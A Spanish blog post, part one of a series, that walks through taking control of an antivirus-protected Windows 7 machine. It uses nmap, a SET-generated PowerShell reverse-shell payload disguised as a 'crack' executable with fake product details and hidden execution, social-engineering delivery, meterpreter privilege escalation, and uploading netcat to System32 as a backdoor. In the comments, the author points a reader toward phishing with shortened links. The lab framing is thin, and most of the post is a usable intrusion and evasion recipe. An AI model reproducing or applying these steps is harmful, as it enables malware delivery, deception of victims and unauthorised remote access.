jueves, 9 de enero de 2014

Hackear windows 7 con antivirus 1/3

Hace una 2 semanas terminaron las conferencias de la comunidad Backtrack Academy con unos ponentes de muy alto nivel, entre ellos hubo una conferencia titulada "Hacking avanzado de Windows 7" a cargo de Rodolfo Ceceña.
Todo el que tenga la oportunidad de verla, es muy recomendable ver como se realiza y que medidas de defensa podemos interponer.

El taller fue muy practico tocando: SET, Metasploit, netcat, ingeniería social desde Kali.

Comente a Rodolfo si le parecia bien que hiciera una guía basada en su charla y le pareció excelente, compartimos los mismos gustos y el mismo objetivo, compartir información de calidad, así que disfruten del laboratorio y Happy Hacking!!

¿Que vamos hacer?
Vamos a tomar el control completo de un sistema Windows 7 con antivirus y pondremos un backdoor para tener acceso cuando queramos.

¿Que necesitamos?
2 maquinas virtuales: Windows 7 con antivirus y Kali Linux en la misma red.

Buscamos a la victima
Una de las opciones para buscar victimas en la red local es usar nmap, para ello vamos a lanzarlo para ver que equipos, puertos y sistema operativos están en esa red local.


 nmap --open -O 192.168.1.0/24
nmap

Mi victima sera la ip 192.168.1.43 con varios puertos abiertos y por el resultado que nos ha dado sera un Windows 7 probablemente.

Creando el payload
Usaremos la aplicacion setoolkit en Kali para realizarle un troyano a medida para conseguir acceso al sistema.

Los parámetros serán:
1.-(1)Social-Engineering Attacks
2.-(10)Powershell Attack Vectors
3.-(1) Powershell Alphanumeric Shellcode Injector
4.- IP: 192.168.1.67  (Ip de kali)
5.-Port: 443
set> yes
SET

Abrimos otra consola y nos dirigimos a la carpeta donde se genero con:
 cd /root/.set/reports/powershell
Hacemos un ls y nos encontraremos x86_powershell_injection.txt

Ese archivo lo copiamos a nuestro escritorio con:
cp x86_powershell_injection.txt /root/Desktop

Ahora me lo llevare a otro equipo, en este caso sera un windows para prepararlo.

Abrimos el archivo con el bloc de notas y lo guardamos con un nombre con gancho, que la persona le tiente a darle en mi caso crack_windows_7.bat

Ahora lo transformaremos a un fichero .exe para ello usaremos Bat_to_exe_converter, lo descargamos, extraemos y  ejecutamos como administrador.

Cargamos el archivo bat y configuramos:
Invisible application (Para que no levante sospechas por el antivirus).
Add administrator manifest (Sirve para que se ejecute con altos privilegios.)
Y en la pestaña "versioninformations" introducimos los datos del producto fake que queramos para hacerlo mas creíble.
creando batpropiedades exe

En caso de tener antivirus activo habra que desactivarlo para que al compilarlo no detecte el código malicioso y nos fastidie el proceso.

Y ya tenemos nuestra aplicación creada.
exe creado

Este archivo es el que debemos enviar a nuestra victima, aquí tenéis diferentes métodos de enviarlo (por correo, descarga de un servidor de archivos, facebook, pendrive...) y la forma que se os ocurra, esto se denomina ingeniería social. Yo lo envió a la maquina victima.

Ahora volvemos a nuestro metasploit que estará esperando a que sea ejecutado el programa .
troyano escuchando


Por curiosidad lo analice por ver si levanta sospechas y veis el resultado, es invisible para los antivirus. Lo que demuestra que los antivirus son una capa pero no la seguridad completa.
antivirus no detecta


Y conseguimos ya la conexión, y con una sesion de meterpreter.
session1 metaploit

Para elevar privilegios haremos lo siguiente:
sysinfo para ver la informacion del sistema
getuid: muestra el usuario que eres
getsystem: consigue elevar privilegios a system
getuid
escala privilegios

Ahora vamos a backdoorizar el sistema:
Para esto usaremos Netcat, una herramienta excelente para abrir puertos, asociarlo a una shell y forzar conexiones.

Abrimos otra consola y ponemos: locate windows-binaries
y hacemos cd /usr/share/windows-binaries
y ls  (El programa que nos interesa es nc.exe que es el netcat)
ponemos pwd para saber la ruta que introduciremos.
archivo creado

Y copiamos la direccion /usr/share/windows-binaries/nc.exe , y seguido ponemos la ruta en la que se subira en este caso lo guardaremos en System32 para poderlo llamar facilmente despues. Con el comando upload previamente para subir el archivo.

upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
*Esas doble barras son para que lo lea, en caso de poner una no traga la barra.

cambiar ubicacion

Mañana parte 2 para no alargarlo mucho.

6 comentarios:

  1. Hola gracias por el aporte pero que pasaria si yo quiera el de x64_powershell_injection.txt /root/Desktop porque tan solo me sale para x86 ayuda por favor

    ResponderEliminar
  2. Porque al hacer x86 es compatible con el x64, con lo que es una tonteria hacerlo especial para x64 pudiendo hacer un x86 y que valga con los 2 tipos. No vi el comentario antes, sorry.

    ResponderEliminar
  3. hola hice todos los pasos pero al intentar enviar el payload por facebook no me deja.. me gustaria saber como hacer para esconderlo en una url de minivideo para que sea mas creible y asi cuando la victima ejecute ese supuesto video en su facebook me de la sesion de meterpreter, vi unos videos en los que un tipo hace eso en el programa argentino cqc pero no se como es que se hace... te agradeceria mucho tu ayuda... solamente quiero aprender, mi objetivo no es hacerle mal a nadie solamente saber porque me encanta la seguridad informatica

    ResponderEliminar
  4. Para lo que tu dices de facebook no tiene nada que ver con este ataque, el que tu dices es phising creando una pagina falsa haciendose pasar por la real, y eso lo puedes enmascarar en una url acortada y hacer exactamente lo que hizo el de CQC https://www.youtube.com/watch?v=5oCcUL1VXfQ Un saludo!!

    ResponderEliminar
  5. Hola Saludos. Disculpa jajajaja tal vez ya no recuerdes este post pero ojala y me puedas ayudar en la parte de :

    Ahora volvemos a nuestro metasploit que estará esperando a que sea ejecutado el programa .

    En que momento se genero o que onda.
    Saludos y gracias.

    ResponderEliminar
  6. Hola Emmanuel, en el ahora volvemos es: Cuando la victima hace doble click y abre el archivo es cuando se comunica con el atacante, por lo que si no te sale algo estara mal, probablemente sea algo de las ips locales.

    Un saludo, y cualquier duda sigue preguntando ;)

    ResponderEliminar